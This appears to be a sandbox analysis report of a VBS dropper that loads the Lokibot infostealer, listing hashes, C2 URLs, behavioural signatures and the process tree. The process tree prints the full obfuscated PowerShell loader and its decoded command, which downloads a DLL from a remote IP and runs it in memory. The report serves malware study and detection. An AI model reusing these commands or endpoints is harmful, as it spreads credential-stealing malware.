Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 12:43
Static task
static1
Behavioral task
behavioral1
Sample
65b56626ae18acca0542ed6349fe76ff.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
65b56626ae18acca0542ed6349fe76ff.vbs
Resource
win10v2004-20220901-en
General
-
Target
65b56626ae18acca0542ed6349fe76ff.vbs
-
Size
159KB
-
MD5
5bc0dbb1d4f2c3ee0aaad47f123f95bb
-
SHA1
5aaf4ad4a1e1a4fa206b0034b5653e09c4715071
-
SHA256
792266a30b07db531fd65d979c4f91a271207eb2f3ffdee26f452ceba9af5349
-
SHA512
cd8e2c2b0a4e1631a30dfd6be8dc22da411704da116bbcafe68caaa3efefd6c2062f53e0b39bea81c50e473493868af3f1594cc21f25417bac202bf149e8d0ae
-
SSDEEP
3072:oHGRwfkYFEhNe4VTdRnTT8w4TWXZqvcjk:7wfkYFYZqvcw
Malware Config
Extracted
http://4.204.233.44/dll/NoStartUp.ppam
Extracted
lokibot
http://cantebo.buzz/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 3 724 powershell.exe 4 724 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 724 set thread context of 4748 724 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 5024 powershell.exe 5024 powershell.exe 724 powershell.exe 724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 5024 powershell.exe Token: SeDebugPrivilege 724 powershell.exe Token: SeDebugPrivilege 4748 RegAsm.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 4948 wrote to memory of 5024 4948 WScript.exe powershell.exe PID 4948 wrote to memory of 5024 4948 WScript.exe powershell.exe PID 5024 wrote to memory of 724 5024 powershell.exe powershell.exe PID 5024 wrote to memory of 724 5024 powershell.exe powershell.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe PID 724 wrote to memory of 4748 724 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65b56626ae18acca0542ed6349fe76ff.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DQ❤Lg❤y❤D❤❤N❤❤u❤DI❤Mw❤z❤C4❤N❤❤0❤C8❤Z❤Bs❤Gw❤LwBO❤G8❤UwB0❤GE❤cgB0❤FU❤c❤❤u❤H❤❤c❤Bh❤G0❤Jw❤p❤Ck❤OwBb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QQBw❤H❤❤R❤Bv❤G0❤YQBp❤G4❤XQ❤6❤Do❤QwB1❤HI❤cgBl❤G4❤d❤BE❤G8❤bQBh❤Gk❤bg❤u❤Ew❤bwBh❤GQ❤K❤❤k❤EQ❤T❤BM❤Ck❤LgBH❤GU❤d❤BU❤Hk❤c❤Bl❤Cg❤JwBG❤Gk❤YgBl❤HI❤LgBI❤G8❤bQBl❤Cc❤KQ❤u❤Ec❤ZQB0❤E0❤ZQB0❤Gg❤bwBk❤Cg❤JwBW❤EE❤SQ❤n❤Ck❤LgBJ❤G4❤dgBv❤Gs❤ZQ❤o❤CQ❤bgB1❤Gw❤b❤❤s❤C❤❤WwBv❤GI❤agBl❤GM❤d❤Bb❤F0❤XQ❤g❤Cg❤JwB0❤Hg❤d❤❤u❤HM❤awBk❤GI❤ZgBm❤Go❤agBk❤HM❤YgBm❤Ho❤agBz❤HY❤Z❤Bm❤Go❤Z❤Br❤Go❤eg❤v❤DQ❤Mg❤u❤D❤❤Mg❤x❤C4❤O❤❤3❤DE❤Lg❤1❤Dk❤MQ❤v❤C8❤OgBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://4.204.233.44/dll/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.skdbffjjdsbfzjsvdfjdkjz/42.021.871.591//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
memory/724-139-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmpFilesize
10.8MB
-
memory/724-134-0x0000000000000000-mapping.dmp
-
memory/724-136-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmpFilesize
10.8MB
-
memory/4748-138-0x00000000004139DE-mapping.dmp
-
memory/4748-137-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4748-144-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4748-145-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/4748-146-0x0000000000400000-0x00000000004A2000-memory.dmpFilesize
648KB
-
memory/5024-132-0x0000000000000000-mapping.dmp
-
memory/5024-135-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmpFilesize
10.8MB
-
memory/5024-133-0x000001DF12720000-0x000001DF12742000-memory.dmpFilesize
136KB
-
memory/5024-142-0x00007FFFE81E0000-0x00007FFFE8CA1000-memory.dmpFilesize
10.8MB